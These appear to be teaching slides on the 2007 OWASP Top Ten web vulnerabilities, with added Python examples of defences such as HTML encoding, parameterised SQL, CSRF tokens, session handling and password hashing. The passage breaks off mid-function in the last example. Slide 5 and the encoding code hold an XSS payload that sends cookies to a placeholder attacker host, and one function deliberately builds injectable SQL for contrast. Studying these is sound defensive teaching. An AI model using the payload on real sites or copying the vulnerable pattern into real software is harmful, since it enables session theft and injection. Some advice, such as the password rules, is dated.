The document discusses the Open Web Application Security Project (OWASP) and its Top 10 vulnerabilities. OWASP is an open source non-profit organization dedicated to web application security. The document outlines the OWASP Top 10 vulnerabilities from 2007, including Cross-Site Scripting (XSS), Injection Flaws, Malicious File Execution, and others. It then provides detailed explanations and examples of each vulnerability, as well as recommendations for prevention and mitigation.
2. What is OWASP?
Open Web Application Security Project
An all-volunteer group, a not-for-profit charitable organization
Produces free, professional-quality, open-source documentation, tools, and standards
Dedicated to helping organizations understand and improve the security of their web applications
Facilitates conferences, local chapters, articles, papers, and message forums
IFETCE/M.E CSE/NE7202-NIS/Unit 4 2
3. OWASP 2007 Top Ten List
A1. Cross-Site Scripting (XSS)
A2. Injection Flaws
A3. Malicious File Execution
A4. Insecure Direct Object Reference
A5. Cross Site Request Forgery (CSRF)
A6. Information Leakage & Improper Error Handling
A7. Broken Authentication & Session Management
A8. Insecure Cryptographic Storage
A9. Insecure Communications
A10. Failure to Restrict URL Access
4. A1. Cross-Site Scripting (XSS) Flaws
OWASP Definition
XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
5. A1. Cross-Site Scripting (XSS) Attacks
3 Categories of XSS attacks:
◦ Stored - the injected code is permanently stored (in a database, message forum, visitor log, etc.)
◦ Reflected - attacks that are reflected take some other route to the victim (through an e-mail message, or bounced off from some other server)
◦ DOM injection - injected code manipulates the site's JavaScript code or variables, rather than HTML objects.
Example: comment embedded with JavaScript
comment="Nice site! <SCRIPT>window.open('http://badguy.com/info.pl?'+document.cookie)</SCRIPT>"
6. A1. Cross-Site Scripting (XSS)
Occurs when an attacker can manipulate a Web application to send malicious scripts to a third party (also known as XSS).
This is usually done when there is a location that arbitrary content can be entered into (such as an e-mail message, or a free text field for example) and then referenced by the target of the attack.
The attack typically takes the form of an HTML tag (frequently a hyperlink) that contains malicious scripting (often JavaScript).
The target of the attack trusts the Web application and thus XSS attacks exploit that trust to do things that would not normally be allowed.
Unicode and other methods of encoding the malicious portion of the tag are often used so the request looks less suspicious to the target user or to evade IDS/IPS.
8. XSS - Protection
Protect your application from XSS attacks
Filter output by converting text/data which might have dangerous HTML characters to its encoded format:
◦ '<' and '>' to '&lt;' and '&gt;'
◦ '(' and ')' to '&#40;' and '&#41;'
◦ '#' and '&' to '&#35;' and '&amp;'
Recommend filtering on input as much as possible. (Some data may need to allow special characters.)
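The output-encoding rule from the slide above, written out as an added Python example (not code from the slides). It applies the slide's six substitutions plus, as an extra beyond the slide's list, the two quote characters that matter when the value lands inside an HTML attribute, and it renders the stored-XSS comment from slide 5 to show that the script is delivered to the browser as inert text. The `render_comment` template and the sample comment are constructed for the example.

```python
from typing import Dict

# The slide's list of dangerous characters and their HTML entity forms.
SLIDE_ENTITY_MAP: Dict[str, str] = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    "(": "&#40;",
    ")": "&#41;",
    "#": "&#35;",
}

# Added beyond the slide's list: needed when untrusted data is placed inside an
# attribute value such as value="...".
EXTRA_ENTITY_MAP: Dict[str, str] = {
    '"': "&quot;",
    "'": "&#39;",
}


def encode_for_html(text: str, include_quotes: bool = True) -> str:
    """Encode untrusted text so the browser treats it as data, never as markup."""
    table = dict(SLIDE_ENTITY_MAP)
    if include_quotes:
        table.update(EXTRA_ENTITY_MAP)
    # One pass over the characters: an '&' produced by one substitution is never
    # fed back into another, so "&lt;" cannot become "&amp;lt;".
    return "".join(table.get(ch, ch) for ch in text)


def render_comment(comment: str) -> str:
    """Hypothetical server-side template: encoding happens at OUTPUT time, where the
    HTML context is known, regardless of what input filtering was done earlier."""
    return '<div class="comment">' + encode_for_html(comment) + "</div>"


# Constructed sample: the cookie-stealing comment shown on slide 5.
HOSTILE_COMMENT = (
    'Nice site! <SCRIPT>window.open("http://badguy.com/info.pl?"'
    "+document.cookie)</SCRIPT>"
)


def is_neutralized(rendered: str) -> bool:
    """True when no raw tag delimiters, parentheses or quotes from the user data
    survive in the rendered comment body."""
    body = rendered[len('<div class="comment">'):-len("</div>")]
    return not any(ch in body for ch in "<>()\"'")
```

Python's `html.escape` covers `& < > " '` but not `( ) #`; the slide's list is broader because those characters matter inside script and event-handler contexts. Whatever encoder is used, it must be chosen for the context the data is written into (HTML body, attribute, JavaScript string, URL), which is why the encoding belongs at output rather than only at input.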
9. A2. Injection Flaws
OWASP Definition:
Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
10. A2. Injection Flaws
Some common types of command injection flaws include:
◦ SQL injection (malicious calls to backend databases via SQL), using shell commands to run external programs
◦ Using system calls to in turn make calls to the operating system.
Any Web application that relies on the use of an interpreter has the potential to fall victim to this type of flaw.
11. A2. Injection Flaws: Protection
Use language specific libraries to perform the same functions as shell commands and system calls
Check for existing reusable libraries to validate input and safely perform system functions, or develop your own.
Perform design and code reviews on the reusable libraries to ensure security.
Other common methods of protection include:
◦ Data validation (to ensure input isn't malicious code)
◦ Run commands with very minimal privileges, so that if the application is compromised the damage will be minimized.
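The "user-supplied data sent to an interpreter as part of a query" problem from slides 9 to 11, as an added Python example that is not from the slides. It places a string-concatenated SQL query beside the parameterised form and shows, with a perfectly ordinary user name containing an apostrophe, that the concatenated version is parsed as SQL by the interpreter while the bound parameter is only ever treated as data. The in-memory SQLite database and its rows are constructed for the example.

```python
import sqlite3
from typing import Optional


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory database with two sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.invalid"), ("O'Brien", "obrien@example.invalid")],
    )
    conn.commit()
    return conn


def lookup_email_unsafe(conn: sqlite3.Connection, name: str) -> Optional[str]:
    """VULNERABLE: the user value is pasted into the SQL text, so the database
    interpreter parses whatever the user typed as part of the query."""
    query = "SELECT email FROM users WHERE name = '" + name + "'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def lookup_email_safe(conn: sqlite3.Connection, name: str) -> Optional[str]:
    """Parameterised: the query text is fixed and the value is bound separately,
    so it can never change the structure of the command."""
    row = conn.execute("SELECT email FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def unsafe_breaks_on(conn: sqlite3.Connection, name: str) -> bool:
    """True when the concatenated query cannot even be parsed for this input."""
    try:
        lookup_email_unsafe(conn, name)
        return False
    except sqlite3.OperationalError:
        # The apostrophe in the name terminated the string literal early and the
        # rest was read as SQL: exactly the interpreter confusion the slide describes.
        return True


DEMO_DB = build_demo_db()
```

The same rule applies to the shell and system-call cases on slide 10: pass arguments as a list to `subprocess.run` rather than building a command string, or, as slide 11 recommends, use the language's own library (`os.listdir`, `shutil.copy`) instead of shelling out at all.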
12. A3. Malicious File Execution
OWASP Definition:
Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise.
Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
13. A3. Malicious File Execution
Applications which allow the user to provide a filename, or part of a filename, are often vulnerable if input is not carefully validated.
Allowing the attacker to manipulate the filename may cause the application to execute a system program or external URL.
Applications which allow file uploads have additional risks:
◦ Place executable code into the application
◦ Replace a session file, log file or authentication token
14. A3. Malicious File Execution Protection
Do not allow user input to be used for any part of a file or path name.
Where user input must influence a file name or URL, use a fully enumerated list to positively validate the value.
File uploads have to be done VERY carefully.
◦ Only allow uploads to a path outside of the webroot so it cannot be executed
◦ Validate the file name provided so that a directory path is not included.
◦ Implement or enable sandbox or chroot controls which limit the application's access to files.
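The three protections from the slide above, as an added Python example rather than code from the slides: a fully enumerated list that turns user input into a lookup key instead of a path fragment, a file-name check that rejects any directory component or executable extension, and an upload routine that writes only under a directory assumed to sit outside the web root and confirms the resolved path stayed there. The template table, the extension policy and the temporary upload directory are all constructed for the example.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import Optional

# Constructed allowlist: the user's value selects a key and is never joined into
# a path, so the set of files that can ever be opened is fully enumerated.
TEMPLATE_FILES = {
    "home": "home.html",
    "about": "about.html",
    "contact": "contact.html",
}


def resolve_template(choice: str) -> Optional[str]:
    """Positive validation: only listed keys resolve; everything else is rejected."""
    return TEMPLATE_FILES.get(choice)


# Hypothetical policy: a plain base name with a non-executable extension.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(txt|pdf|png|jpg)$")


def sanitize_upload_name(client_name: str) -> Optional[str]:
    """Reject a client-supplied name carrying any directory component (either
    separator style) or an extension outside the policy."""
    base = os.path.basename(client_name.replace("\\", "/"))
    if base != client_name or not SAFE_NAME.match(base):
        return None
    return base


def store_upload(upload_root: Path, client_name: str, data: bytes) -> Optional[Path]:
    """Write the file under upload_root, a directory outside the web root so the
    server never serves or executes it, and confirm the final path did not escape."""
    name = sanitize_upload_name(client_name)
    if name is None:
        return None
    root = upload_root.resolve()
    dest = (root / name).resolve()
    if dest.parent != root:          # second line of defence against traversal
        return None
    dest.write_bytes(data)
    return dest


def demo() -> dict:
    """Exercise the upload path against a throwaway directory standing in for a
    location such as /var/app/uploads (hypothetical)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "uploads"
        root.mkdir()
        good = store_upload(root, "report.pdf", b"%PDF-1.4 constructed sample")
        traversal = store_upload(root, "../index.html", b"<html></html>")
        script = store_upload(root, "upload.php", b"<?php ?>")
        return {
            "stored": good is not None and good.parent == root.resolve(),
            "traversal_rejected": traversal is None,
            "script_rejected": script is None,
        }
```

The slide's third bullet (sandbox or chroot) is an operating-system control rather than application code, so it is not modelled here; the `dest.parent != root` check is the in-process approximation of "the application may only touch files under this directory".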
15. A4. Insecure Direct Object Reference
OWASP Definition:
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
16. A4. Insecure Direct Object Reference
Applications often expose internal objects, making them accessible via parameters.
When those objects are exposed, the attacker may manipulate unauthorized objects, if proper access controls are not in place.
Internal objects might include:
◦ Files or directories
◦ URLs
◦ Database keys, such as acct_no, group_id etc.
◦ Other database object names such as table names
17. A4. Insecure Direct Object Reference Protection
Do not expose direct objects via parameters
Use an indirect mapping which is simple to validate.
Consider using a mapped numeric range, file=1 or 2 ...
Re-verify authorization at every reference.
For example:
1. The application provides an initial list of only the authorized options.
2. When the user's option is "submitted" as a parameter, authorization must be checked again.
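The two-step example on the slide above (offer only authorized options, then re-check on submit) carried through as an added Python example that is not from the slides. The indirect map hands the browser the small numbers the slide suggests while the real `acct_no` values stay on the server, and `fetch_account` re-verifies ownership against the authoritative store even for a number that was legitimately offered, which catches the case where authorization changed after the page was rendered. The user-to-account table is constructed for the example.

```python
from typing import Dict, List, Optional

# Constructed data: which account numbers each user is authorized to see.
ACCOUNTS_BY_USER: Dict[str, List[str]] = {
    "alice": ["ACCT-1001", "ACCT-1002"],
    "bob": ["ACCT-2001"],
}


class ReferenceMap:
    """Per-session indirect map: the browser only ever sees 1, 2, 3 ...; the real
    keys stay server-side, so there is nothing meaningful to tamper with."""

    def __init__(self) -> None:
        self._by_index: Dict[str, str] = {}

    def build(self, user: str) -> List[str]:
        """Step 1 from the slide: offer only the options this user is authorized for."""
        self._by_index = {
            str(i + 1): acct
            for i, acct in enumerate(ACCOUNTS_BY_USER.get(user, []))
        }
        return list(self._by_index)

    def lookup(self, index: str) -> Optional[str]:
        return self._by_index.get(index)


def fetch_account(
    user: str,
    session_map: ReferenceMap,
    submitted: str,
    accounts: Dict[str, List[str]] = ACCOUNTS_BY_USER,
) -> Optional[str]:
    """Step 2 from the slide: when the choice comes back as a parameter, check
    authorization again rather than trusting that it came from our own list."""
    acct = session_map.lookup(submitted)
    if acct is None:
        return None                      # not an option this session was offered
    if acct not in accounts.get(user, []):
        return None                      # ownership re-verified against the store
    return acct


ALICE_MAP = ReferenceMap()
ALICE_OPTIONS = ALICE_MAP.build("alice")
```

Submitting a real key such as `ACCT-2001` directly is rejected at the first check because it is not an index in the map; submitting an index that was valid earlier but whose account has since been reassigned is rejected at the second.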
18. A5. Cross Site Request Forgery (CSRF)
OWASP Definition:
A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
19. A5. Cross Site Request Forgery (CSRF)
Applications are vulnerable if any of the following holds:
◦ Does not re-verify authorization of the action
◦ Default login/password will authorize the action
◦ The action will be authorized based only on credentials which are automatically submitted by the browser, such as a session cookie, Kerberos token, basic authentication, or SSL certificate etc.
20. A5. Cross Site Request Forgery (CSRF) Protection
Eliminate any Cross Site Scripting vulnerabilities
◦ Not all CSRF attacks require XSS
◦ However XSS is a major channel for delivery of CSRF attacks
Generate unique random tokens for each form or URL, which are not automatically transmitted by the browser.
Do not allow GET requests for sensitive actions.
For sensitive actions, re-authenticate or digitally sign the transaction.
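The token and no-GET protections from the slide above, as an added Python example rather than code from the slides. The token is random per session and lives only in the server-side session and in a hidden form field, so it is exactly the kind of credential slide 19 says the browser does not attach automatically; a forged request from another origin carries the victim's cookie but not the token and is refused. The `Session` object, the form and the `/transfer` action are constructed for the example.

```python
import hmac
import secrets
from typing import Dict, Tuple


class Session:
    """Server-side session for an already logged-in user (constructed). The CSRF
    token is random per session and is NOT a cookie, so a request the browser
    builds on an attacker's behalf will not carry it."""

    def __init__(self) -> None:
        self.user = "alice"
        self.csrf_token = secrets.token_urlsafe(32)


def render_transfer_form(session: Session) -> str:
    """Legitimate page: embeds the session's token in a hidden field."""
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input name="amount"><button>Send</button></form>'
    )


def handle_transfer(session: Session, method: str, params: Dict[str, str]) -> Tuple[int, str]:
    """Sensitive action: accepted over POST only, and the submitted token must
    match the one stored in the session (constant-time comparison)."""
    if method != "POST":
        return 405, "sensitive actions are not accepted over GET"
    submitted = params.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session.csrf_token):
        return 403, "missing or invalid CSRF token"
    return 200, f"{session.user} transferred {params.get('amount', '0')}"


SESSION = Session()

# What a cross-site page can make the browser send: the amount it chose, with the
# victim's cookies attached automatically, but without the token it cannot read.
FORGED_PARAMS = {"amount": "1000"}
```

The slide's last bullet (re-authenticate or sign the transaction for the most sensitive actions) stacks on top of this: the token proves the request came from the application's own page, while re-authentication proves the user is present and intends the action.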
21. OWASP A6. Information Leakage & Improper Error Handling
OWASP Definition:
Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data or conduct more serious attacks.
22. Improper Error Handling Examples
Example 1
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access 97 Driver] Can't open database 'VDPROD'.
Example 2
java.sql.SQLException: ORA-00600: internal error code, arguments: [ttcgnd-1], [0], [], [], [],
at oracle.jdbc.dbaccess.DBError.throwSqlException (DBError.java:169)
at oracle.jdbc.ttc7.TTIoer.processError (TTIoer.java:208)
Messages helpful for debug
Provides way too much information!
Very helpful to a potential attacker
23. Improper Error Handling: ProtectionImproper Error Handling: Protection
Prevent display of detailed internal error messages including stack traces,
messages with database or table names, protocols, and other error codes.
(This can provide attackers clues as to potential flaws.)
Good error handling systems should always enforce the security scheme in
place while still being able to handle any feasible input.
Provide short error messages to the user while logging detailed error
information to an internal log file.
◦ Diagnostic information is available to site maintainers
◦ Vague messages indicating an internal failure provided to the users
Provide just enough information to allow what is reported by the user to be
able to linked the internal error logs. For example: System Time-stamp,
client IP address, and URL
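An added example of the logging scheme above, not code from the slides: the user receives a generic message plus a random reference id, while the exception, timestamp, client IP and URL go to an internal log under that same id. The in-memory log sink, the sample exception text, the IP address and the marker list are constructed for the example.

```python
import logging
import secrets
import time

# In-memory log sink so the example is self-contained; a real deployment writes
# to a file or log pipeline that end users cannot read (assumption).
INTERNAL_LOG = []


class _ListHandler(logging.Handler):
    def emit(self, record):
        INTERNAL_LOG.append(self.format(record))


log = logging.getLogger("app.errors")
log.setLevel(logging.ERROR)
log.propagate = False
log.addHandler(_ListHandler())

GENERIC_MESSAGE = "An internal error occurred. Please try again later."


def handle_failure(exc, client_ip, url):
    """Map an unhandled exception to a safe user response.

    Full details (exception text, traceback, timestamp, client IP, URL) go to
    the internal log under a random reference id; the user sees only a short
    generic message plus that id, which is enough for support staff to find
    the matching log entry.
    """
    ref = secrets.token_hex(8)
    ts = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
    log.error("ref=%s ts=%s ip=%s url=%s error=%r", ref, ts, client_ip, url, exc,
              exc_info=(type(exc), exc, exc.__traceback__))
    return {"status": 500, "body": f"{GENERIC_MESSAGE} Reference: {ref}", "ref": ref}


# Strings that have no business appearing in a response body; used as a
# regression check that the generic handler does not leak. The list is
# illustrative, not complete.
LEAK_MARKERS = ("ORA-", "SQLException", "ODBC", "Traceback", "at oracle.",
                "Can't open database")


def response_leaks_internals(body):
    """True if the body looks like a raw driver/stack-trace message."""
    return any(marker in body for marker in LEAK_MARKERS)


def _demo():
    # Constructed failure resembling the slide's Example 2
    try:
        raise RuntimeError("ORA-00600: internal error code, arguments: [ttcgnd-1]")
    except RuntimeError as e:
        return handle_failure(e, "203.0.113.7", "/account/view?id=42")
```

The marker check is the kind of assertion worth keeping in an integration test: deliberately break a database query and verify the response still passes it.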
24. Information Leakage - Example
Sensitive information can be leaked very subtly
Very Common Example - Account Harvesting
◦ The application responds differently to a valid user name with an invalid password than to an invalid user name
◦ The Web application thereby discloses which logins are valid vs. which are invalid, and allows accounts to be guessed and harvested
◦ Provides the attacker with an important initial piece of information, which may then be followed with password guessing
◦ The difference in the Web application's response may be:
Intentional (easier for users to tell when the account name is wrong)
A different code included in the URL, or in a hidden field
Any minor difference in the HTML is sufficient
Differences in timing are also common and may be used (for example, when the password hash is only computed for user names that exist)
25. Information Leakage: Protections
Ensure sensitive responses with multiple outcomes return identical results
Save the different responses and diff the HTML, the HTTP headers and the URL
Ensure error responses are returned in roughly the same time. A random wait time on all transactions only adds noise that an attacker can average out over many requests; the reliable approach is to do the same work on every path, for example always computing the password hash even when the user name does not exist
26. A7. Broken Authentication and Session Management
OWASP Definition:
Account credentials and session tokens are
often not properly protected. Attackers
compromise passwords, keys, or
authentication tokens to assume other users’
identities.
27. Session Management
HTTP (with or without TLS) is stateless: the protocol does not provide tracking of a user's session.
Session tracking answers the question:
◦ After a user authenticates, how does the server associate subsequent requests with the authenticated user?
Typically, Web application frameworks provide built-in session tracking, which is good if used properly.
Often developers make the mistake of inventing their own session tracking.
28. Session Management (Session IDs)
A Session ID is
◦ Unique to the user
◦ Used for only one authenticated session
◦ Generated by the server
◦ Sent to the client as a hidden form variable, an HTTP cookie, or a URL query string (not a good practice)
The client is expected to send back the same ID with each subsequent request.
29. Session Management (Session Hijacking)
Session ID is disclosed or is guessed.
An attacker using the same session ID has the same
privileges as the real user.
Especially useful to an attacker if the session is
privileged.
Allows initial access to the Web application to be
combined with other attacks.
30. Session Management: Protection
Use a long, complex, random session ID that cannot be guessed (generated from a cryptographic random source, never from time, counters or user data).
Protect the transmission and storage of the Session ID to prevent disclosure and hijacking.
A URL query string should not be used for the Session ID or any user/session information
◦ The URL is stored in the browser history and cache
◦ Logged via Web proxies and stored in the proxy cache
◦ Sent to other sites in the Referer header when the user follows a link
Example of what not to do:
https://www.example.net/servlet/login?userid=ralph&password=dumb
31. Session Management: Protection
The entire session should be transmitted via HTTPS to prevent disclosure of the session ID (not just the authentication step).
Avoid or protect any session information transmitted to/from the client.
The Session ID should expire and/or time out on the server when idle or on logout.
Client-side cookie expirations are useful, but cannot be trusted; the server must enforce the timeout itself.
Regenerate a new session ID upon successful authentication or privilege level change, so that an ID an attacker captured or planted before login (session fixation) is worthless.
32. Session Management: Protection
Example Session ID set in a cookie. Server response:
Set-Cookie: siteid=91d3dc13713aa579d0f148972384f4; Path=/; Expires=Wed, 22-Oct-2006 02:12:40 GMT; Domain=.www.rd1.net; Secure
Client's next request:
Cookie: siteid=91d3dc13713aa579d0f148972384f4
The Secure flag ensures the cookie is only sent over HTTPS; adding HttpOnly as well keeps it out of reach of script, which limits theft through XSS.
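An added example, not code from the slides, of the session handling advice on the previous three slides: 256-bit ids from the OS CSPRNG, idle timeout and logout enforced on the server, a fresh id issued on login, and a cookie header carrying Secure and HttpOnly. The in-memory store, the timeout value and the SameSite attribute (a browser feature that post-dates these slides) are assumptions.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60     # seconds of inactivity the server tolerates (assumed value)
ID_BYTES = 32              # 256 bits of CSPRNG output per id

# Constructed in-memory store: sid -> {"user": str or None, "last_seen": float}
_SESSIONS = {}


def _new_id():
    return secrets.token_urlsafe(ID_BYTES)


def create_session(now=None):
    """Anonymous pre-login session."""
    now = time.time() if now is None else now
    sid = _new_id()
    _SESSIONS[sid] = {"user": None, "last_seen": now}
    return sid


def lookup(sid, now=None):
    """Return session data, or None if the id is unknown or has been idle too
    long. Expiry is enforced here, on the server, whatever the cookie's
    Expires attribute claims."""
    now = time.time() if now is None else now
    s = _SESSIONS.get(sid)
    if s is None:
        return None
    if now - s["last_seen"] > IDLE_TIMEOUT:
        del _SESSIONS[sid]
        return None
    s["last_seen"] = now
    return s


def authenticate(sid, user, now=None):
    """On successful login, discard the old id and issue a new one, so an id
    the attacker captured or planted before login (session fixation) is
    worthless afterwards."""
    now = time.time() if now is None else now
    if lookup(sid, now) is None:
        raise ValueError("no live session")
    del _SESSIONS[sid]
    new_sid = _new_id()
    _SESSIONS[new_sid] = {"user": user, "last_seen": now}
    return new_sid


def logout(sid):
    """Invalidate on the server; clearing the cookie alone would not suffice."""
    _SESSIONS.pop(sid, None)


def session_cookie_header(sid):
    """Secure: never sent over plaintext HTTP. HttpOnly: not readable by script.
    SameSite=Lax: not attached to cross-site POSTs (later browser feature,
    added here as an assumption)."""
    return f"Set-Cookie: sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

The `now` parameter exists so the timeout logic can be tested deterministically; production callers leave it unset.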
33. Broken Account Management
Even valid authentication schemes can be undermined by
flawed account management functions including:
Account update
Forgotten password recovery or reset
Change password, and other similar functions
34. Broken Account and Session Management: Protection
Password Change Controls - require users to provide
both old and new passwords
Forgotten Password Controls - if forgotten passwords
are emailed to users, they should be required to re-
authenticate whenever they attempt to change their email
address.
Password Strength - require at least 7 characters, with
letters, numbers, and special characters both upper case
and lower case.
Password Expiration - Users must change passwords
every 90 days, and administrators every 30 days.
35. Broken Account and Session Management: Protection
Password Storage - never store passwords in plain text. Passwords should always be stored in either hashed (preferred: a salted, deliberately slow password hash) or encrypted form.
Protecting Credentials in Transit - to prevent "man-in-the-middle" attacks the entire authenticated session / transaction should be encrypted with SSL/TLS. (SSLv3 and TLSv1 were the recommendation when these slides were written; both are now deprecated, and TLS 1.2 or later should be required.)
Man-in-the-middle attacks - are still possible with SSL/TLS if users disable or ignore warnings about invalid certificates.
Replay attacks - transformations such as hashing on the client side provide little protection, as the hashed version can simply be intercepted and retransmitted, so the actual plain text password is not needed.
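An added example covering both the account-harvesting protections (slide 25) and the password-storage advice here, not code from the slides. Passwords are stored as salted PBKDF2-HMAC-SHA256 records using only the Python standard library, and login runs the same hash computation and returns the same message whether or not the user name exists. The user table, the iteration count and the user names are assumptions.

```python
import hashlib
import hmac
import os

# PBKDF2-HMAC-SHA256 work factor. Kept low so the example runs quickly; in
# production set it as high as the login latency budget allows (assumption).
ITERATIONS = 50_000


def hash_password(password, salt=None):
    """Return a self-describing record: algorithm$iterations$salt$digest (hex).

    A fresh 16-byte salt per password means identical passwords produce
    different records, so precomputed tables are useless."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute the digest with the stored salt and parameters and compare in
    constant time. The parameters travel with the record, so the iteration
    count can be raised later without invalidating old hashes."""
    algo, iters, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported password record")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


# Constructed user table; only hash records are stored.
USERS = {"ralph": hash_password("correct horse battery staple")}

# Throwaway record used for unknown user names, so the server does the same
# amount of work whether or not the account exists (no timing oracle).
_DUMMY_RECORD = hash_password(os.urandom(16).hex())

LOGIN_FAILED = "Invalid username or password."


def login(username, password):
    """One failure message and constant work for bad user and bad password."""
    record = USERS.get(username, _DUMMY_RECORD)
    password_ok = verify_password(password, record)     # always computed
    if not (password_ok and username in USERS):
        return {"ok": False, "message": LOGIN_FAILED}
    return {"ok": True, "message": "Login successful."}
```

Note that the dummy record is hashed with a random string, so even a password guess that happened to match it cannot succeed: the final check still requires the user name to exist.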
36. A8. Insecure Cryptographic Storage
OWASP Definition:
Web applications rarely use cryptographic functions
properly to protect data and credentials. Attackers
use weakly protected data to conduct identity theft
and other crimes, such as credit card fraud.
37. OWASP A8. Insecure Cryptographic Storage
The majority of Web applications in use today need to store sensitive information (passwords, credit card numbers, proprietary information, etc.) in a secure fashion.
The use of encryption has become relatively easy for developers to incorporate.
Proper utilization of cryptography, however, remains elusive: developers overestimate the protection provided by encryption and underestimate the difficulties of proper implementation and of protecting the keys.
38. Insecure Cryptographic Storage: Common Mistakes
Improper/insecure storage of passwords, certificates, and keys
Poor choice of algorithm (obsolete or weak ciphers and hashes)
Poor source of randomness for keys and initialization vectors
Attempting to develop a new encryption scheme "in house" (always a BAD idea)
Failure to provide functionality to change (rotate) encryption keys
39. Insecure Cryptographic Storage: Protection
Avoid storing sensitive information when possible
Use only approved standard algorithms
Use platform specific approved storage mechanisms
Ask, read and learn about coding best practices for your platform
Careful review of all system designs
Beware of transparent and automated encryption solutions (for example, full-disk or database-level encryption), as they are typically just as transparent to an attacker who has compromised the running application
Source code reviews
40. A9. Insecure Communications
OWASP Definition:
Applications frequently fail to encrypt network traffic
when it is necessary to protect sensitive
communications.
41. Insecure Communications
Failure to encrypt network traffic leaves the information available to be sniffed from any compromised system/device on the network.
Switched networks do not provide adequate protection (traffic can still be redirected, for example by ARP spoofing).
SSL/TLS man-in-the-middle attacks succeed whenever the client does not validate the server certificate.
42. Insecure Communications: Protection
Use SSL/TLS for ALL connections that are authenticated or transmitting sensitive information
Use SSL/TLS for mid-tier and internal network communications between Web server, application and database.
Configure desktop clients and servers to ensure only strong protocol versions and ciphers are used. (The original advice of SSLv3 and TLSv1 is dated; both are now deprecated and TLS 1.2 or later should be the minimum.)
Use only valid trusted SSL/TLS certificates and train users to expect valid certificates to prevent man-in-the-middle attacks.
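An added example, not from the slides, of applying this advice with Python's ssl module: a client context that validates the certificate chain and hostname and refuses anything below TLS 1.2, beside the permissive configuration that makes man-in-the-middle trivial, plus a policy check a test suite can run before deployment. Nothing here opens a network connection.

```python
import ssl


def hardened_client_context():
    """Today's equivalent of the slide's advice: verify the chain against the
    system trust store, check the hostname, and refuse anything below TLS 1.2
    (SSLv3 and TLS 1.0, named on the slide, are now deprecated)."""
    ctx = ssl.create_default_context()   # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def permissive_client_context():
    """The pattern that makes man-in-the-middle trivial: the client accepts
    any certificate, so a proxy with a self-signed cert reads everything.
    Shown only for contrast."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_is_acceptable(ctx):
    """Policy check: certificate required, hostname checked, TLS >= 1.2."""
    return (ctx.verify_mode == ssl.CERT_REQUIRED
            and ctx.check_hostname
            and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2)
```

Pass the hardened context to `http.client.HTTPSConnection(host, context=ctx)` or `urllib.request`; the same policy check applies to server contexts, minus `check_hostname`.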
43. A10. Failure to Restrict URL Access
OWASP Definition:
Frequently, an application only protects sensitive
functionality by preventing the display of links or
URLs to unauthorized users. Attackers can use this
weakness to access and perform unauthorized
operations by accessing those URLs directly.
44. A10. Failure to Restrict URL Access
When the application fails to restrict access to administrative URLs, the attacker can simply type the URLs into the browser.
Surprisingly common, for example:
◦ Add_account_form.php - checks for admin access before displaying the form.
◦ The form then posts to add_acct.php which does the work, but doesn't check for admin privileges!
Consistent URL access control has to be carefully designed: every request, not just the ones that render links, must pass through the same authorization check.
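An added example, not from the slides, reconstructing the add_account_form.php / add_acct.php flaw above and its fix: a single dispatch point that authorizes every URL against a role policy with deny-by-default, and an access matrix that exercises the invalid attempts as well as the valid ones. The role table, policy and user names are assumptions.

```python
# Constructed role and policy data (assumptions standing in for the app's
# real user store and route table).
ROLES = {"ralph": {"user"}, "admin1": {"user", "admin"}}
POLICY = {                      # URL -> role required to reach it
    "add_account_form.php": "admin",
    "add_acct.php": "admin",
    "profile.php": "user",
}
ACCOUNTS = set()


def vulnerable_add_acct(user, new_account):
    """The flaw from the slide: the form page checks for admin, but the POST
    target that does the work does not, so anyone who knows the URL can call
    it directly."""
    ACCOUNTS.add(new_account)
    return 200, f"created {new_account}"


def authorize(user, url):
    """Deny by default: a URL with no policy entry is reachable by nobody."""
    required = POLICY.get(url)
    if required is None:
        return False
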